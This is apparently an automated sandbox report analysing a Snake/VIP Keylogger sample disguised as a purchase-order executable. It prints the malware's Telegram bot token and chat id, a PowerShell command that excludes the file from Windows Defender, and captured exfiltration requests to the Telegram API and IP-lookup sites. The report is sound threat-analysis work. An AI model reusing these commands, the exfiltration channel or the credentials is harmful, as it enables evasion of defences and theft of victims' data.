Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Overview

General Information

Sample name:SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
renamed because original name is a hash value
Original sample name:SC110-11Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe
Analysis ID:1636899
MD5:d18ab5998c51922215bf0210b3d47491
SHA1:0e8e9cad6aa5715dcc0daa67782cde0ca8a971ac
SHA256:e91f580c44b75485d8742039aa469e5c979e44db9d8fee5f2017e4f5c7cc0796
Tags:exeuser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe" MD5: D18AB5998C51922215BF0210B3D47491)
    • powershell.exe (PID: 7452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7756 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Bot Token": "7772411030:AAHExC6psygkhMTNAOoX6_LedLTg2d-pLt4", "Chat id": "-4724020147"}
{"Exfil Mode": "Telegram", "Token": "7772411030:AAHExC6psygkhMTNAOoX6_LedLTg2d-pLt4", "Chat_id": "-4724020147", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2db6f:$a1: get_encryptedPassword
        • 0x2de90:$a2: get_encryptedUsername
        • 0x2d97f:$a3: get_timePasswordChanged
        • 0x2da88:$a4: get_passwordField
        • 0x2db85:$a5: set_encryptedPassword
        • 0x2f229:$a7: get_logins
        • 0x2f18c:$a10: KeyLoggerEventArgs
        • 0x2edf1:$a11: KeyLoggerEventArgsEventHandler
        00000004.00000002.1527211447.0000000002951000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 13 entries
          SourceRuleDescriptionAuthorStrings
          4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2dd6f:$a1: get_encryptedPassword
                • 0x2e090:$a2: get_encryptedUsername
                • 0x2db7f:$a3: get_timePasswordChanged
                • 0x2dc88:$a4: get_passwordField
                • 0x2dd85:$a5: set_encryptedPassword
                • 0x2f429:$a7: get_logins
                • 0x2f38c:$a10: KeyLoggerEventArgs
                • 0x2eff1:$a11: KeyLoggerEventArgsEventHandler
                4.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3bb75:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x3b218:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x3b475:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3be54:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 25 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", ParentImage: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, ParentProcessId: 7348, ParentProcessName: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", ProcessId: 7452, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", ParentImage: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, ParentProcessId: 7348, ParentProcessName: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", ProcessId: 7452, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", ParentImage: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, ParentProcessId: 7348, ParentProcessName: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe", ProcessId: 7452, ProcessName: powershell.exe
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7756, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-13T08:49:23.323844+010028033053Unknown Traffic192.168.2.1149701104.21.64.1443TCP
                2025-03-13T08:49:28.595176+010028033053Unknown Traffic192.168.2.1149707104.21.64.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-13T08:49:18.471175+010028032742Potentially Bad Traffic192.168.2.1149699193.122.130.080TCP
                2025-03-13T08:49:21.156741+010028032742Potentially Bad Traffic192.168.2.1149699193.122.130.080TCP
                2025-03-13T08:49:23.878815+010028032742Potentially Bad Traffic192.168.2.1149702193.122.130.080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-13T08:49:44.776619+010018100071Potentially Bad Traffic192.168.2.1154971149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeAvira: detected
                Source: 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7772411030:AAHExC6psygkhMTNAOoX6_LedLTg2d-pLt4", "Chat id": "-4724020147"}
                Source: 00000004.00000002.1526045025.0000000000402000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7772411030:AAHExC6psygkhMTNAOoX6_LedLTg2d-pLt4", "Chat_id": "-4724020147", "Version": "4.4"}
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeVirustotal: Detection: 28%Perma Link
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeReversingLabs: Detection: 34%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpackString decryptor:
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpackString decryptor: 7772411030:AAHExC6psygkhMTNAOoX6_LedLTg2d-pLt4
                Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.unpackString decryptor: -4724020147

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49700 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:54971 version: TLS 1.2
                Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb< source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1531945426.0000000006249000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.ni.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1531782194.0000000006200000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.ni.pdbRSDS source: WERE482.tmp.dmp.15.dr
                Source: Binary string: System.Configuration.ni.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbL~ source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526321352.0000000000BD6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Security.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WERE482.tmp.dmp.15.dr
                Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526321352.0000000000BD6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526321352.0000000000BD6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: System.Drawing.pdbpO& source: WERE482.tmp.dmp.15.dr
                Source: Binary string: System.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1531782194.0000000006200000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WERE482.tmp.dmp.15.dr
                Source: Binary string: System.Core.ni.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: >*OoVisualBasic.pdb! source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526208132.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: System.Web.Extensions.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: mscorlib.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb~ source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1531782194.0000000006200000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: mscorlib.ni.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: System.Core.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: System.Windows.Forms.pdblZ source: WERE482.tmp.dmp.15.dr
                Source: Binary string: O1.PDB source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526208132.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERE482.tmp.dmp.15.dr
                Source: Binary string: System.ni.pdb source: WERE482.tmp.dmp.15.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERE482.tmp.dmp.15.dr
                Source: Binary string: uc.pdb source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1526208132.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Web.pdb source: WERE482.tmp.dmp.15.dr
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 0280F475h4_2_0280F2D8
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 0280F475h4_2_0280F4C4
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 0280FC31h4_2_0280F979
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 066A3308h4_2_066A2EF0
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 066A2D41h4_2_066A2A90
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_066A0673
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 066AD919h4_2_066AD670
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 066AEA79h4_2_066AE7D0
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 066AF781h4_2_066AF4D8
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 066A3308h4_2_066A3236
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 066AD4C1h4_2_066AD218
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 066AE621h4_2_066AE378
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_066A0040
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 066AF329h4_2_066AF080
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 066A3308h4_2_066A2EE6
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 066AE1C9h4_2_066ADF20
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 066AEED1h4_2_066AEC28
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 066AD069h4_2_066ACDC0
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 066ADD71h4_2_066ADAC8
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 066A0D0Dh4_2_066A0B30
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 066A16F8h4_2_066A0B30
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_066A0853
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeCode function: 4x nop then jmp 066AFBD9h4_2_066AF930

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.11:54971 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficTCP traffic: 192.168.2.11:54960 -> 1.1.1.1:53
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2014/03/2025%20/%2006:54:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49702 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49699 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49701 -> 104.21.64.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49707 -> 104.21.64.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49700 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
